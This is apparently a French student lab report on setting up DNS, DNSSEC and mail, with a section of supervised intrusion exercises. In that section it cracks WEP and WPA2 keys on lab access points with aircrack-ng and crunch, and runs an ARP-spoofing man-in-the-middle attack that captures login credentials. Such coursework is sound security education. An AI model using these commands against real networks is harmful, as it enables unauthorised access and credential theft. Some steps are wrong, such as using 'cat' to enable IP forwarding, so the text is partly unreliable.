&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commancer, on crée un repertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une méchagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenètre de configuration s'ouver. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on resoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commance &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====renvoie du mail Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
